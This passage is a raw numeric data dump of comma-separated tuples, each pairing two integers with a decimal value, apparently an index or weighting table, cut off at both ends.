19661,1.09669),(105,19662,1.14331),(105,19663,1.23669),(105,19664,0.95669),(105,19665,1.02669),(105,19666,1.07331),(105,19667,1.14331),(105,19668,0.51331),(125,19668,0.51331),(105,19669,1.21331),(105,19670,1.28331),(105,19671,0.46669),(105,19672,1.00331),(105,19673,1.12),(105,19674,0.98),(105,19675,1.14331),(105,19676,0.23331),(105,19677,0.88669),(105,19678,0.98),(105,19679,0.09331),(105,19680,0.93331),(105,19681,1.12),(105,19682,0.46669),(105,19683,1.05),(105,19684,1.12),(105,19685,0.88669),(105,19686,1.00331),(105,19687,0.28),(105,19688,1.16669),(105,19689,1.30669),(105,20307,0.51331),(105,20308,1.05),(105,20309,1.16669),(110,20310,1.05),(112,20310,1.05),(105,20310,2.1),(105,20311,1.07331),(105,20312,1.02669),(105,20313,1.19),(105,20314,0.28),(105,20315,0.93331),(105,20316,1.14331),(105,20317,0.32669),(105,20318,0.98),(105,20319,1.23669),(105,20320,0.46669),(105,20321,1.02669),(105,20322,1.12),(105,20323,0.28),(105,20324,0.88669),(105,20325,1.12),(105,20326,0.74662),(105,20327,1.00331),(105,20328,1.12),(105,20329,0.95669),(105,20330,1.14331),(105,20331,0.14),(123,20331,0.14),(126,20331,0.14),(106,20331,0.28),(112,20331,0.28),(105,20332,0.88669),(105,20333,0.95669),(105,20334,0.37331),(105,20335,0.98),(105,20336,1.05),(105,20337,0.42),(105,20338,1.00331),(105,20339,1.23669),(105,20340,0.56),(105,20341,1.00331),(105,20342,1.19),(105,20343,0.91),(105,20344,1.14331),(105,20345,0.32669),(105,20346,0.93331),(105,20347,1.07331),(105,20348,0.23331),(105,20349,0.88669),(105,20350,1.09669),(105,20351,0.18669),(120,20351,0.18669),(125,20351,0.18669),(105,20352,0.95669),(105,20353,1.00331),(105,20354,0.32669),(105,20355,1.00331),(105,20356,1.09669),(105,20357,0.32669),(105,20358,1.05),(105,20359,1.14331),(105,20752,0.84),(105,20753,0.88669),(105,20754,0.88669),(105,20755,0.95669),(106,20775,0.32669),(106,20776,0.93331),(106,20777,1.19),(106,21005,0.42),(106,21006,1.12),(106,21007,1.33),(106,21008,0.51331),(106,21009,1.19),(106,21010,1.37669),(106,21011,0.56),(106,21012,1.14331),(106,21013,1.21331),(106,21014,1.02669),(106,21015,1.09669),(106,21016,0.23331),(123,21016,0.23331),(106,21017,0.91),(106,21018,1.16669),(106,21019,0.32669),(106,21020,0.95669),(106,21021,1.14331),(106,21022,0.23331),(111,21022,0.23331),(120,21022,0.46662),(106,21023,1.02669),(106,21024,1.21331),(106,21025,0.32669),(106,21026,1.02669),(106,21027,1.19),(106,21028,0.37338),(106,21029,0.86331),(106,21030,0.91),(106,21031,0.93331),(106,21032,1.05),(106,21033,0.28),(106,21034,0.98),(106,21035,1.07331),(106,21036,0.37331),(106,21037,1.05),(106,21038,1.14331),(113,21039,0.32669),(128,21039,0.65338),(106,21039,0.98007),(106,21040,1.05),(106,21041,1.16669),(106,21042,1.00331),(106,21043,1.09669),(106,21044,0.42),(106,21045,1.02669),(106,21046,1.21331),(106,21047,0.28),(106,21048,1.02669),(106,21049,1.16669),(106,21050,0.18669),(106,21051,0.95669),(106,21052,1.14331),(118,21053,0.18669),(106,21053,0.37338),(106,21054,0.91),(106,21055,1.05),(106,21056,0.91),(106,21057,1.05),(106,21058,0.32669),(123,21058,0.32669),(106,21059,1.07331),(106,21060,1.23669),(106,21061,0.32669),(106,21062,0.95669),(106,21063,1.14331),(106,21064,0.51331),(106,21065,1.07331),(106,21066,1.21331),(106,21067,0.46669),(106,21068,1.00331),(106,21069,1.12),(106,21070,0.84),(106,21071,1.00331),(106,21072,1.12),(106,21073,1.02669),(106,21074,1.21331),(106,21075,0.56),(106,21076,1.09669),(106,21077,1.21331),(106,21078,0.37331),(106,21079,1.02669),(106,21080,1.21331),(106,21081,0.91),(106,21082,1.07331),(106,21083,0.93331),(106,21084,1.02669),(106,21085,0.98),(106,21086,1.21331),(106,21087,0.37331),(106,21088,1.07331),(106,21089,1.23669),(106,21090,0.32669),(106,21091,1.09669),(106,21092,1.23669),(106,21762,0.09331),(106,21763,0.93331),(106,21764,1.02669),(106,21765,1.02669),(106,21766,1.23669),(106,21767,0.86331),(106,21768,1.12),(106,21769,0.46669),(106,21770,1.05),(106,21771,1.14331),(106,21772,0.37331),(106,21773,0.98),(106,21774,1.16669),(106,21775,0.65331),(106,21776,1.09669),(106,21777,1.19),(106,21778,0.51331),(106,21779,1.05),(106,21780,1.33),(106,21781,0.93324),(106,21782,0.91),(106,21783,1.12),(106,21784,0.95669),(106,21785,1.19),(106,21786,0.93331),(106,21787,1.09669),(106,21788,0.93331),(106,21789,1.09669),(109,21790,0.28),(123,21790,0.28),(106,21790,0.56),(119,21790,0.56),(106,21791,1.05),(106,21792,1.28331),(106,21793,0.98),(106,21794,1.07331),(106,21795,0.74676),(106,21796,0.91),(106,21797,1.09669),(106,21798,0.91),(106,21799,1.09669),(106,21800,0.93331),(106,21801,1.14331),(106,21802,1.00331),(106,21803,1.21331),(106,21804,0.37331),(106,21805,1.14331),(106,21806,1.35331),(106,21807,0.14),(106,21808,0.95669),(106,21809,1.07331),(106,22139,0.86331),(119,22139,0.86331),(106,22140,0.98),(106,22141,0.88669),(106,22142,1.00331),(106,22143,0.91),(106,22144,1.00331),(106,22145,0.46662),(106,22146,0.93331),(106,22147,1.05),(106,22148,0.95669),(106,22149,1.07331),(106,22150,0.86331),(112,22150,0.86331),(113,22150,0.86331),(119,22150,0.86331),(126,22150,0.86331),(106,22151,0.98),(106,22152,0.37331),(110,22152,0.37331),(106,22153,0.98),(106,22154,1.07331),(107,22330,1.96014),(107,22331,1.91338),(107,22332,2.14662),(107,22333,3.73324),(107,22334,4.10676),(107,22335,1.00331),(107,22336,1.07331),(107,22337,0.42),(107,22338,0.98),(107,22339,1.07331),(107,22340,0.28),(118,22340,0.28),(119,22340,0.28),(126,22340,0.28),(107,22341,1.00331),(118,22341,1.00331),(119,22341,1.00331),(126,22341,1.00331),(107,22342,1.16669),(110,22343,0.23331),(112,22343,0.23331),(118,22343,0.23331),(119,22343,0.23331),(126,22343,0.23331),(107,22343,0.46662),(128,22343,1.86648),(113,22343,5.59944),(118,22344,1.00331),(119,22344,1.00331),(126,22344,1.00331),(107,22344,2.00662),(107,22345,1.23669),(107,22346,1.16669),(118,22346,1.16669),(119,22346,1.16669),(126,22346,1.16669),(107,22347,1.68),(107,22348,3.64),(107,22349,4.01324),(107,22350,1.91338),(107,22351,2.14662),(107,22352,1.30676),(107,22353,3.73324),(107,22354,2.33338),(107,22355,2.28662),(107,22356,0.23331),(123,22356,0.46662),(107,22357,0.93331),(107,22358,1.16669),(107,22359,2.00662),(107,22360,2.14662),(107,22361,0.37331),(107,22362,0.95669),(107,22363,1.05),(107,22364,0.46669),(107,22365,1.00331),(107,22366,1.07331),(107,22367,0.46669),(107,22368,1.12),(107,22369,1.23669),(107,22370,0.37338),(120,22370,0.37338),(107,22371,1.72662),(107,22372,2.14662),(107,22373,1.12),(107,22374,1.21331),(107,22375,0.95669),(107,22376,1.05),(107,22377,0.65338),(107,22378,1.00331),(107,22379,1.09669),(107,22380,1.00331),(107,22381,1.26),(107,22382,0.95669),(107,22383,1.12),(125,22800,0.18669),(107,22800,0.37338),(107,22801,1.82),(107,22802,2.05338),(107,22803,0.74662),(107,22804,1.96),(107,22805,2.33338),(107,22806,0.98),(107,22807,1.07331),(107,22808,0.95669),(107,22809,1.05),(107,22810,0.32669),(117,22810,0.32669),(107,22811,1.05),(107,22812,1.26),(107,22813,2.00662),(107,22814,1.07331),(107,22815,1.23669),(107,22816,0.84),(107,22817,1.96),(107,22818,2.1),(107,22819,0.42),(111,22819,0.42),(110,22819,1.68),(107,22820,1.00331),(107,22821,1.12),(110,22822,0.32669),(107,22822,0.65338),(107,22823,1.96),(107,22824,2.19338),(107,22825,0.65338),(107,22826,1.91338),(107,22827,2.24),(107,23048,0.28),(107,23049,1.02669),(107,23050,1.19),(107,23051,0.95669),(107,23052,1.68),(107,23053,1.91338),(107,23054,0.88669),(113,23054,0.88669),(119,23054,0.88669),(107,23055,0.95669),(119,23055,0.95669),(107,23056,1.86662),(107,23057,1.00331),(107,23058,0.93331),(107,23059,0.98),(107,23060,2.00662),(107,23061,0.91),(107,23062,0.98),(110,23273,0.28),(117,23286,0.32669),(116,23289,0.14),(110,23301,0.32669),(113,23304,0.28),(126,23304,0.28),(128,23304,0.28),(110,23912,0.23331),(116,24311,0.88669),(118,24311,0.88669),(109,24469,0.14),(121,24469,0.28),(109,24470,1.09669),(109,24471,1.14331),(109,24472,0.42),(109,24473,1.09669),(109,24474,1.14331),(109,24475,0.46669),(109,24476,1.14331),(109,24477,1.21331),(109,24478,0.65338),(109,24479,1.09669),(109,24480,1.21331),(109,24481,1.00331),(109,24482,1.05),(109,24483,0.42),(109,24484,1.02669),(109,24485,1.07331),(109,24486,0.23331),(120,24486,0.23331),(123,24486,0.23331),(119,24486,1.16655),(109,24487,0.86331),(109,24488,1.07331),(114,24489,0.14),(121,24489,0.14),(109,24489,0.28),(111,24489,1.12),(109,24490,0.84),(109,24491,1.05),(109,24492,0.95669),(109,24493,1.16669),(109,24494,0.14),(111,24494,0.56),(109,24495,0.86331),(109,24496,0.93331),(109,24497,0.23331),(109,24498,0.86331),(109,24499,1.09669),(109,24500,0.37331),(109,24501,0.95669),(109,24502,1.07331),(109,24503,1.02662),(109,24504,1.02669),(109,24505,1.09669),(109,24506,1.12),(109,24507,1.26),(109,24508,1.30662),(109,24509,1.16669),(109,24510,1.33),(109,24511,1.12),(109,24512,1.28331),(109,24513,1.86676),(109,24514,1.09669),(109,24515,1.14331),(109,24516,1.14331),(109,24517,1.30669),(109,24518,1.07331),(109,24519,1.26),(109,24520,1.05),(109,24521,1.19),(109,24522,0.7),(109,24523,1.12),(109,24524,1.28331),(109,24525,0.46669),(109,24526,1.02669),(109,24527,1.09669),(109,24528,0.37331),(109,24529,1.05),(109,24530,1.19),(109,24531,0.46669),(113,24531,0.46669),(109,24532,1.00331),(109,24533,1.19),(109,24534,0.37331),(109,24535,0.95669),(109,24536,1.05),(109,24537,0.28),(114,24537,0.28),(121,24537,0.28),(111,24537,0.7),(109,24538,0.84),(109,24539,0.95669),(109,24540,0.86331),(114,24540,0.86331),(109,24541,1.02669),(109,24542,0.46669),(111,24542,0.46669),(113,24542,0.46669),(114,24542,0.46669),(110,24542,0.93338),(109,24543,1.00331),(109,24544,1.33),(109,24545,0.46669),(109,24546,0.98),(109,24547,1.26),(109,24548,0.51331),(109,24549,1.33),(109,24550,1.4),(109,24551,0.28),(109,24552,1.00331),(109,24553,1.14331),(109,24899,1.09669),(114,24899,1.09669),(117,24899,1.09669),(121,24899,1.09669),(128,24899,17.547),(113,24899,28.5139),(109,24900,0.60669),(109,24901,1.14331),(109,24902,1.4),(109,24903,0.23331),(109,24904,1.00331),(109,24905,1.12),(109,24906,0.37331),(109,24907,0.95669),(109,24908,1.19),(109,24909,0.42),(111,24909,0.42),(109,24910,1.00331),(109,24911,1.05),(109,24912,1.07331),(109,24913,1.12),(109,24914,0.42),(112,24914,0.42),(109,24915,0.95669),(109,24916,1.09669),(109,24917,0.46662),(109,24918,0.91),(109,24919,1.07331),(109,24920,1.02669),(109,24921,1.28331),(109,24922,0.93331),(109,24923,1.12),(109,24924,0.37331),(109,24925,1.14331),(109,24926,1.28331),(109,25069,0.86331),(109,25070,1.14331),(110,25938,0.86331),(110,25939,1.12),(110,25940,0.77),(110,25941,0.91),(110,25942,0.46662),(110,25943,1.07331),(110,25944,1.33),(110,25945,1.07331),(110,25946,1.14331),(110,25947,0.42),(110,25948,1.05),(110,25949,1.14331),(110,25950,0.88669),(110,25951,1.02669),(110,25952,0.86331),(110,25953,0.95669),(110,25954,0.37331),(110,25955,1.12),(110,25956,1.19),(110,25957,0.28),(110,25958,1.07331),(110,25959,1.26),(110,25960,1.12),(110,25961,1.82),(110,25962,1.09669),(110,25963,1.09669),(110,25964,1.02669),(110,25965,1.12),(110,25966,0.91),(110,25967,1.02669),(110,25968,0.46669),(110,25969,1.09669),(110,25970,1.14331),(110,25971,1.16655),(110,25972,1.02669),(110,25973,1.21331),(110,25974,0.91),(110,25975,1.05),(110,25976,0.93331),(110,25977,1.05),(110,25978,0.93331),(110,25979,1.02669),(110,25980,0.88669),(110,25981,1.00331),(110,25982,0.51331),(110,25983,1.02669),(110,25984,1.28331),(110,25985,0.18669),(110,25986,1.07331),(110,25987,1.19),(110,25988,0.23331),(110,25989,0.91),(110,25990,0.98),(110,25991,0.84),(110,25992,1.82),(110,25993,1.00331),(110,25994,1.12),(110,25995,1.05),(110,25996,1.12),(110,25997,0.91),(110,25998,1.07331),(120,25999,0.18669),(110,25999,0.37338),(120,26000,0.93331),(110,26000,1.86662),(110,26001,2.19338),(110,26002,0.60669),(110,26003,1.12),(110,26004,1.30669),(110,26005,1.00331),(110,26006,1.07331),(110,26007,0.95669),(112,26007,0.95669),(128,26007,3.82676),(113,26007,9.5669),(110,26008,1.12),(112,26008,1.12),(128,26008,4.48),(113,26008,11.2),(110,26009,0.42),(113,26009,0.42),(110,26010,1.07331),(110,26011,1.14331),(110,26012,1.00331),(110,26013,0.37331),(110,26014,0.95669),(110,26015,1.05),(110,26016,0.23331),(110,26017,0.88669),(110,26018,1.02669),(110,26019,0.37331),(110,26020,0.98),(110,26021,1.12),(110,26022,0.84),(110,26023,1.00331),(110,26024,1.23669),(110,26025,1.82),(110,26026,1.23669),(110,26027,1.07331),(110,26028,0.28),(110,26029,0.91),(110,26030,1.12),(110,26031,0.93331),(110,26032,1.02669),(119,26033,0.42),(110,26033,0.84),(110,26034,0.98),(110,26035,1.16669),(110,26036,0.98),(110,26037,1.09669),(110,26038,0.46669),(116,26038,0.93338),(110,26039,1.02669),(110,26040,1.12),(110,26041,1.12),(110,26042,1.19),(110,26043,1.05),(110,26044,1.12),(110,26045,1.68),(110,26046,3.15),(110,26047,2.52),(110,26048,1.35331),(110,26049,0.98),(110,26050,1.07331),(110,26051,1.21331),(110,26052,1.4),(110,26053,1.07331),(110,26054,1.26),(110,26055,0.93331),(110,26056,1.02669),(110,26057,1.02669),(110,26058,1.14331),(110,26059,0.56),(110,26060,1.14331),(110,26061,1.30669),(110,26062,0.46669),(119,26062,0.46669),(110,26063,1.00331),(110,26064,1.12),(110,26065,1.12),(110,26066,3.82676),(110,26067,1.14331),(110,26068,1.02669),(110,26069,2.1),(110,26070,0.84),(110,26071,0.98),(110,26072,1.07331),(110,26073,1.00331),(110,26074,1.16669),(110,26075,0.46669),(110,26076,1.02669),(110,26077,1.26),(110,26078,1.00331),(110,26079,1.09669),(110,26080,1.16669),(110,26081,1.21331),(110,26082,0.93331),(110,26083,0.98),(110,26084,1.14331),(110,26085,1.23669),(110,26086,1.00331),(110,26087,1.19),(110,26088,1.02669),(110,26089,1.30669),(110,26090,0.37331),(110,26091,0.95669),(110,26092,1.05),(110,26093,0.37331),(110,26094,0.95669),(110,26095,1.05),(110,26096,0.37331),(110,26097,1.05),(110,26098,1.14331),(110,26099,0.46669),(110,26100,1.19),(110,26101,1.26),(110,26102,0.98007),(110,26103,0.95669),(110,26104,1.14331),(110,26105,1.86662),(110,26106,1.07331),(110,26107,1.02669),(110,26108,1.14331),(110,26109,1.26),(110,26110,0.42),(110,26111,1.14331),(110,26112,1.21331),(110,26113,0.98007),(110,26114,0.95669),(110,26115,1.16669),(110,26116,0.95669),(110,26117,1.05),(110,26118,0.95669),(110,26119,1.09669),(110,26120,0.42),(110,26121,0.98),(110,26122,1.16669),(110,26123,2.28683),(110,26124,0.95669),(110,26125,1.14331),(110,26126,0.91),(110,26127,0.95669),(110,26128,1.07331),(110,26129,1.19),(110,26130,1.86662),(110,26131,1.02669),(110,26132,1.05),(110,26133,1.07331),(110,26134,1.14331),(110,26135,1.02669),(110,26136,1.30669),(110,26137,1.11993),(110,26138,0.95669),(110,26139,1.02669),(110,26140,1.91338),(110,26141,1.12),(110,26142,1.14331),(110,26143,1.00331),(110,26144,1.23669),(110,26145,0.95669),(110,26146,1.07331),(110,26147,0.46669),(110,26148,1.00331),(110,26149,1.12),(110,26150,0.51331),(120,26150,0.51331),(110,26151,1.05),(110,26152,1.14331),(110,26153,0.86331),(110,26154,1.05),(110,26155,0.51331),(110,26156,1.07331),(110,26157,1.23669),(110,26158,1.05),(110,26159,1.12),(110,26160,0.98),(110,26161,1.12),(110,26162,0.28),(125,26162,0.28),(110,26163,0.91),(110,26164,1.07331),(110,26165,0.46662),(119,26165,0.46662),(110,26166,0.98),(110,26167,1.28331),(110,26168,1.02669),(110,26169,1.23669),(110,26170,0.28),(110,26171,0.93331),(110,26172,1.07331),(110,26173,0.93331),(110,26174,1.12),(110,26175,0.32669),(110,26176,0.93331),(110,26177,1.02669),(110,26178,0.37331),(116,26178,0.37331),(110,26179,1.05),(110,26180,1.12),(110,26181,0.37331),(110,26182,1.07331),(110,26183,1.16669),(110,26184,0.28),(110,26185,0.88669),(110,26186,1.12),(110,28234,0.77),(110,28235,0.91),(110,28236,0.37331),(110,28237,1.00331),(110,28238,1.09669),(110,28239,0.32669),(110,28240,0.95669),(110,28241,1.14331),(110,28242,0.95669),(110,28243,1.12),(128,28244,0.93338),(110,28244,1.40007),(110,28245,1.19),(110,28246,1.37669),(110,28247,1.12),(110,28248,1.21331),(110,28249,1.09669),(110,28250,1.19),(112,28251,0.32669),(110,28251,0.65338),(112,28252,1.05),(110,28252,2.1),(110,28253,1.19),(110,28254,1.12),(110,28255,0.98007),(110,28256,0.95669),(110,28257,1.07331),(110,28258,0.93331),(110,28259,1.12),(110,28260,0.93331),(110,28261,1.07331),(110,28262,0.65338),(110,28263,1.91338),(110,28264,2.19338),(110,28265,1.86655),(110,28266,0.95669),(110,28267,1.02669),(110,28268,1.05),(110,28269,1.14331),(110,28270,0.95669),(110,28271,1.05),(110,28272,2.1),(110,28273,1.21331),(110,28274,1.28331),(110,28275,0.42),(119,28275,0.42),(110,28276,1.09669),(110,28277,1.26),(110,28278,0.42),(110,28279,1.12),(110,28280,1.19),(110,28281,0.56),(110,28282,1.07331),(110,28283,1.14331),(110,28284,0.28),(110,28285,0.93331),(110,28286,1.02669),(110,28287,0.23331),(117,28287,0.23331),(110,28288,0.88669),(117,28288,0.88669),(110,28289,1.07331),(110,28290,0.42),(110,28291,0.98),(110,28292,1.07331),(110,28293,0.46669),(110,28294,1.07331),(110,28295,1.23669),(110,28296,0.28),(110,28297,1.12),(110,28298,1.19),(110,28299,1.19),(110,28300,1.30669),(110,28301,1.16669),(110,28302,1.30669),(110,28303,2.00662),(110,28304,1.26),(110,28305,1.09669),(110,28306,0.93338),(110,28307,1.02669),(110,28308,1.19),(110,28309,0.46669),(110,28310,1.16669),(110,28311,1.23669),(110,28312,1.23669),(110,28313,1.33),(113,28314,0.32669),(110,28314,1.63345),(110,28315,1.12),(110,28316,1.30669),(110,28317,1.07331),(110,28318,1.16669),(110,28319,1.12),(110,28320,1.21331),(113,28321,0.93331),(110,28321,1.86662),(110,28322,1.05),(110,28323,1.21331),(110,28324,0.74662),(110,28325,1.91338),(110,28326,1.02669),(110,28327,1.05),(110,28328,0.42),(110,28329,1.05),(110,28330,1.16669),(110,28331,1.30676),(110,28332,1.12),(110,28333,1.30669),(110,28334,2.05338),(110,28335,1.19),(110,28336,1.28331),(110,28337,0.95669),(110,28338,1.02669),(110,28339,0.32669),(110,28340,1.09669),(110,28341,1.33),(110,28342,0.46669),(110,28343,1.12),(110,28344,1.35331),(110,28345,0.46669),(110,28346,1.02669),(110,28347,1.19),(110,28348,0.32669),(110,28349,0.91),(110,28350,1.05),(110,28351,0.51331),(110,28352,1.02669),(110,28353,1.12),(110,28354,0.42),(110,28355,0.98),(110,28356,1.14331),(110,28357,0.46669),(110,28358,1.00331),(110,28359,1.12),(110,28360,0.32669),(110,28361,1.05),(110,28362,1.16669),(110,28363,0.23331),(110,28364,0.93331),(110,28365,1.02669),(110,28366,1.16669),(110,28367,1.30669),(110,28368,0.7),(110,28369,1.12),(110,28370,1.26),(110,28371,1.12),(110,28372,1.21331),(110,28373,1.02669),(110,28374,1.28331),(110,28375,0.42),(110,28376,0.98),(110,28377,1.07331),(110,28378,0.93331),(110,28379,1.14331),(110,28380,1.05),(110,28381,1.26),(110,28382,1.11993),(110,28383,0.95669),(110,28384,1.23669),(110,28385,1.96),(110,28386,1.21331),(110,28387,1.12),(110,28388,2.1),(110,28389,0.98),(110,28390,1.12),(110,28391,2.1),(110,28392,2.28662),(110,28393,1.00331),(110,28394,1.09669),(110,28395,1.12),(110,28396,1.19),(110,28397,0.37331),(110,28398,0.95669),(110,28399,1.00331),(110,28400,0.32669),(110,28401,0.93331),(110,28402,1.02669),(110,28403,0.74662),(110,28404,0.95669),(110,28405,1.19),(110,28406,0.95669),(110,28407,1.05),(110,28408,1.4),(110,28409,1.16669),(110,28410,1.26),(110,28411,1.30669),(110,28412,1.4),(110,28413,1.14331),(110,28414,1.86676),(110,28415,0.98),(110,28416,1.19),(110,28417,1.00331),(110,28418,1.09669),(110,28419,2.00662),(110,28420,1.19),(110,28421,1.19),(110,28422,0.98),(110,28423,1.09669),(110,28424,1.02669),(110,28425,1.19),(110,28426,2.05338),(110,28427,1.23669),(110,28428,1.26),(134,28429,0.28),(110,28429,0.56),(110,28430,1.07331),(110,28431,1.14331),(110,28432,0.98),(110,28433,1.12),(120,28434,0.37331),(110,28434,0.74662),(110,28435,0.95669),(110,28436,1.28331),(110,28437,1.16669),(110,28438,1.4),(110,28439,0.95669),(110,28440,1.26),(110,28441,0.28),(110,28442,0.88669),(110,28443,1.02669),(110,28444,0.88669),(110,28445,0.98),(110,28446,0.56),(110,28447,0.93331),(110,28448,1.21331),(110,28449,1.09669),(110,28450,1.16669),(110,28451,0.28),(110,28452,0.91),(110,28453,1.16669),(110,28454,0.32669),(110,28455,0.93331),(110,28456,1.16669),(110,28457,0.51331),(110,28458,1.14331),(110,28459,1.21331),(110,28460,0.56),(110,28461,1.12),(110,28462,1.21331),(110,28463,0.98),(110,28464,1.09669),(110,28465,0.23331),(110,28466,0.98),(110,28467,1.12),(110,28468,2.09979),(110,28469,1.82),(110,28470,1.05),(110,28471,1.00331),(110,28472,0.88669),(110,28473,1.16669),(110,28474,0.88669),(110,28475,1.09669),(110,28476,1.77338),(110,28477,1.02669),(110,28478,0.98),(110,28479,0.95669),(110,28480,1.02669),(110,28481,1.00331),(110,28482,1.07331),(110,28483,0.86331),(110,28484,1.02669),(110,29543,0.95669),(110,29544,1.12),(110,29545,0.88669),(110,29546,1.07331),(110,29547,0.28),(110,29548,1.02669),(110,29549,1.21331),(110,29550,0.86331),(110,29551,1.05),(110,29552,1.05),(110,29553,1.12),(110,29554,0.98),(110,29555,1.14331),(110,29556,0.98),(110,29557,0.95669),(110,29558,1.05),(110,29559,1.28331),(110,29560,0.88669),(110,29561,1.02669),(110,29562,0.86331),(117,29562,0.86331),(110,29563,1.14331),(110,29564,0.23331),(112,29564,0.23331),(119,29564,0.23331),(123,29564,0.23331),(125,29564,0.23331),(110,29565,0.93331),(110,29566,1.09669),(110,29567,0.93331),(110,29568,1.02669),(110,29569,0.91),(110,29570,1.09669),(110,29571,0.91),(110,29572,0.98),(110,29573,1.05),(110,29574,1.14331),(110,29575,1.02669),(110,29576,1.14331),(110,29577,0.14),(110,29578,0.86331),(110,29579,0.93331),(111,29627,0.14),(111,29628,0.93331),(111,29629,1.02669),(111,29918,0.09331),(111,29919,0.79331),(111,29920,0.88669),(111,29921,0.42),(111,29922,0.95669),(111,29923,1.05),(111,29924,0.28),(111,29925,1.07331),(111,29926,1.21331),(111,29927,0.74662),(111,29928,0.95669),(111,29929,1.16669),(111,29930,0.98),(111,29931,1.23669),(111,29932,0.14),(111,29933,1.19),(111,29934,1.35331),(111,29935,0.32669),(111,29936,1.02669),(111,29937,1.19),(111,29938,0.51331),(111,29939,1.16669),(111,29940,1.23669),(111,29941,0.23331),(111,29942,1.00331),(111,29943,1.16669),(111,29944,0.95669),(111,29945,1.14331),(111,29946,0.81669),(111,29947,0.93331),(111,29948,0.84),(114,29948,0.84),(111,29949,1.07331),(111,29950,0.84),(111,29951,1.05),(111,29952,0.86331),(111,29953,0.98),(111,29954,0.86331),(111,29955,0.98),(111,29956,1.96),(111,29957,1.09669),(111,29958,1.19),(111,29959,0.91),(111,29960,1.12),(111,29961,0.81669),(111,29962,1.00331),(111,29963,1.02669),(111,29964,1.28331),(111,29965,0.86331),(111,29966,0.93331),(111,29967,0.65338),(111,29968,1.05),(111,29969,1.09669),(111,29970,1.02669),(111,29971,1.23669),(111,29972,1.02669),(111,29973,1.16669),(111,29974,0.18662),(121,29974,0.18662),(111,29975,0.95669),(111,29976,1.02669),(111,29977,0.86331),(121,29977,1.72662),(111,29978,1.02669),(111,29979,0.23331),(111,29980,1.05),(111,29981,1.21331),(111,29982,0.56007),(111,29983,0.88669),(111,29984,1.09669),(111,29985,0.84),(111,29986,0.98),(111,29987,0.95669),(111,29988,1.21331),(111,29989,0.28),(111,29990,0.95669),(111,29991,1.09669),(111,29992,0.28),(111,29993,0.95669),(111,29994,1.02669),(111,29995,0.7),(111,29996,1.21331),(111,29997,1.4),(111,29998,0.37331),(111,29999,1.07331),(111,30000,1.26),(111,30001,0.37331),(111,30002,0.98),(111,30003,1.14331),(111,30004,0.91),(111,30005,1.09669),(111,30006,1.63338),(111,30007,1.05),(111,30008,1.02669),(111,30009,0.95669),(111,30010,1.14331),(111,30011,0.98),(111,30012,1.02669),(111,30013,1.09669),(111,30014,1.30669),(111,30015,0.51331),(111,30016,1.21331),(111,30017,1.28331),(111,30018,0.46669),(111,30019,1.02669),(111,30020,1.07331),(111,30021,0.51331),(111,30022,1.14331),(111,30023,1.30669),(111,30024,0.51331),(111,30025,1.09669),(111,30026,1.16669),(111,30027,0.46669),(111,30028,1.09669),(111,30029,1.23669),(111,30030,0.46669),(111,30031,0.98),(111,30032,1.14331),(111,30033,0.51331),(111,30034,1.05),(111,30035,1.14331),(111,30036,0.56007),(111,30037,0.86331),(111,30038,1.16669),(111,30039,0.88669),(111,30040,0.93331),(111,30041,1.00331),(111,30042,1.07331),(111,30043,0.95669),(111,30044,1.23669),(111,30045,0.93331),(111,30046,1.23669),(111,30047,0.23331),(111,30048,0.88669),(111,30049,0.98),(111,30050,1.49324),(111,30051,1.19),(111,30052,1.26),(111,30053,1.09669),(111,30054,1.28331),(111,30055,1.02669),(111,30056,1.09669),(111,30057,1.12),(111,30058,1.19),(111,30059,0.42),(111,30060,0.98),(111,30061,1.12),(111,30062,0.42),(111,30063,1.07331),(111,30064,1.14331),(111,30065,0.14),(114,30065,0.14),(111,30066,0.98),(111,30067,1.12),(111,30068,0.93331),(111,30069,1.02669),(111,30070,0.28),(111,30071,0.93331),(111,30072,1.02669),(111,31579,0.60669),(111,31580,1.09669),(111,31581,1.14331),(111,31582,1.14331),(113,31582,1.14331),(121,31582,1.14331),(128,31582,1.14331),(111,31583,1.12),(111,31584,0.14),(111,31585,0.86331),(111,31586,0.93331),(111,31587,0.28),(111,31588,0.91),(111,31589,1.07331),(111,31590,0.42),(111,31591,1.02669),(111,31592,1.12),(111,31593,0.86331),(111,31594,1.12),(111,31595,0.81669),(111,31596,0.93331),(111,31597,0.46669),(111,31598,1.02669),(111,31599,1.26),(111,31600,0.56),(111,31601,0.93331),(111,31602,0.98),(111,31603,1.05),(111,31604,1.14331),(111,31605,0.28),(113,31605,0.28),(128,31605,0.28),(111,31606,0.91),(113,31606,0.91),(128,31606,0.91),(111,31607,1.14331),(111,31608,1.12),(111,31609,1.19),(111,31610,0.46669),(111,31611,1.19),(111,31612,1.35331),(111,31613,1.02669),(111,31614,0.18669),(111,31615,0.86331),(111,31616,1.02669),(111,31617,0.42),(111,31618,0.95669),(111,31619,1.12),(111,31620,0.84),(111,31621,1.09669),(111,31622,1.19),(111,31623,0.95669),(111,31624,1.05),(111,31625,0.7),(111,31626,1.4),(111,31627,1.4),(111,31628,0.56),(111,31629,1.12),(111,31630,1.33),(111,31631,0.32669),(111,31632,1.05),(111,31633,1.12),(111,31634,0.37331),(111,31635,1.19),(111,31636,1.28331),(111,31637,1.12),(111,31638,1.33),(111,31639,0.32669),(111,31640,1.00331),(111,31641,1.07331),(111,31642,0.46669),(111,31643,1.00331),(111,31644,1.28331),(111,31645,0.42),(111,31646,0.95669),(111,31647,1.02669),(111,31648,0.32669),(114,31648,0.32669),(111,31649,0.91),(111,31650,1.00331),(111,31651,0.32669),(111,31652,1.05),(111,31653,1.23669),(111,31654,0.37331),(111,31655,1.12),(111,31656,1.21331),(111,32130,0.23331),(111,32131,0.91),(111,32132,1.33),(111,32133,0.95669),(111,32134,1.05),(111,32135,0.98),(111,32136,1.14331),(111,32137,0.23331),(111,32138,1.02669),(111,32139,1.26),(111,32140,0.42),(111,32141,1.00331),(111,32142,1.4),(111,32143,0.23331),(111,32144,0.93331),(111,32145,1.07331),(112,32420,0.46669),(112,32421,1.02669),(112,32422,1.14331),(112,32423,0.18669),(119,32423,0.18669),(112,32424,0.88669),(112,32425,0.93331),(112,32426,0.93331),(112,32427,1.02669),(112,32428,0.84),(112,32429,0.93331),(112,32430,1.07331),(112,32431,0.93331),(112,32432,1.05),(112,32433,0.93331),(112,32434,1.05),(112,32435,0.51331),(112,32436,1.07331),(112,32437,1.16669),(112,32438,0.28),(112,32439,1.07331),(112,32440,1.33),(112,32441,0.28),(113,32441,0.84),(112,32442,0.98),(112,32443,1.07331),(112,32444,1.07331),(112,32445,1.14331),(112,32446,0.95669),(112,32447,1.02669),(112,32448,0.93331),(112,32449,1.05),(112,32450,0.32669),(112,32451,0.95669),(112,